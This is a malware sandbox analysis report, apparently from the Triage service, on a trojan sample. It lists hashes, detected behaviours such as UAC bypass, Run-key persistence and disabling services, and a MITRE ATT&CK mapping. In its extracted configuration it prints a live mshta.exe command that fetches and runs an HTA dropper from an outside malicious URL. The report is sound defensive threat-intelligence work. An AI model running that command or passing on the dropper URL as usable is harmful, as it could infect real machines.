e24d4e9188c3fa5246436b14a81489dd93dc8e1d99f9fdd0abaa207acd4c157e | Triage

Sharing

General

Target

f0cbf6929fda2a51baf7dd154b94342f_JaffaCakes118
Size

2.2MB
Sample

240921-24zktazake
MD5

f0cbf6929fda2a51baf7dd154b94342f
SHA1

e65312de31ec555e464d7b05d424918f8f696304
SHA256

e24d4e9188c3fa5246436b14a81489dd93dc8e1d99f9fdd0abaa207acd4c157e
SHA512

d24646dfac190148da7179f3ccd9e2f02e6aed631527265803937251f27c57eef6c26c03daac7694248b46233c6d296a98d47bd11dcb45c77f35e75cc27a78f0
SSDEEP

24576:+kv4d+NvM4auS/eY/q/fBuLARQoclgvO4JppSGtpI3BTBWU/8VaRNX2B9A:vv409R8qXBuL6O4VS6G3xUU/8VaPmY

Score

10^/10

defense_evasion discovery evasion execution persistence trojan upx

Malware Config

Extracted

Language

hta

Source

1
mshta.exe "http://galaint.onlinesecstats.info/?0=118&1=2&2=1&3=59&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=vevabuudpc&14=1"

URLs

hta.dropper

http://galaint.onlinesecstats.info/?0=118&1=2&2=1&3=59&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=vevabuudpc&14=1

Targets

- Target
  
  f0cbf6929fda2a51baf7dd154b94342f_JaffaCakes118
- Size
  
  2.2MB
- MD5
  
  f0cbf6929fda2a51baf7dd154b94342f
- SHA1
  
  e65312de31ec555e464d7b05d424918f8f696304
- SHA256
  
  e24d4e9188c3fa5246436b14a81489dd93dc8e1d99f9fdd0abaa207acd4c157e
- SHA512
  
  d24646dfac190148da7179f3ccd9e2f02e6aed631527265803937251f27c57eef6c26c03daac7694248b46233c6d296a98d47bd11dcb45c77f35e75cc27a78f0
- SSDEEP
  
  24576:+kv4d+NvM4auS/eY/q/fBuLARQoclgvO4JppSGtpI3BTBWU/8VaRNX2B9A:vv409R8qXBuL6O4VS6G3xUU/8VaPmY
Score

10^/10

defense_evasion discovery evasion execution persistence trojan upx
- Disables service(s)
  evasion execution
- UAC bypass
  evasion trojan
- Disables taskbar notifications via registry modification
  evasion
- Event Triggered Execution: Image File Execution Options Injection
  persistence
- Stops running service(s)
  evasion execution
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
- UPX packed file
  Detects executables packed with UPX/modified UPX open source packer.
  upx
- Adds Run key to start application
  persistence
- Checks whether UAC is enabled
  evasion trojan
- Indicator Removal: File Deletion
  Adversaries may delete files left behind by the actions of their intrusion activity.
  defense_evasion
- Drops file in System32 directory
behavioral1 behavioral2

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

Service Execution

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Create or Modify System Process

Windows Service

Event Triggered Execution

Image File Execution Options Injection

Privilege Escalation

Abuse Elevation Control Mechanism

Bypass User Account Control

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Create or Modify System Process

Windows Service

Event Triggered Execution

Image File Execution Options Injection

Defense Evasion

Abuse Elevation Control Mechanism

Bypass User Account Control

Impair Defenses

Disable or Modify Tools

Indicator Removal

File Deletion

Modify Registry

Subvert Trust Controls

Install Root Certificate

Credential Access

Discovery

System Information Discovery

System Location Discovery

System Language Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

Tasks

static1

behavioral1

defense_evasiondiscoveryevasionexecutionpersistencetrojanupx

behavioral2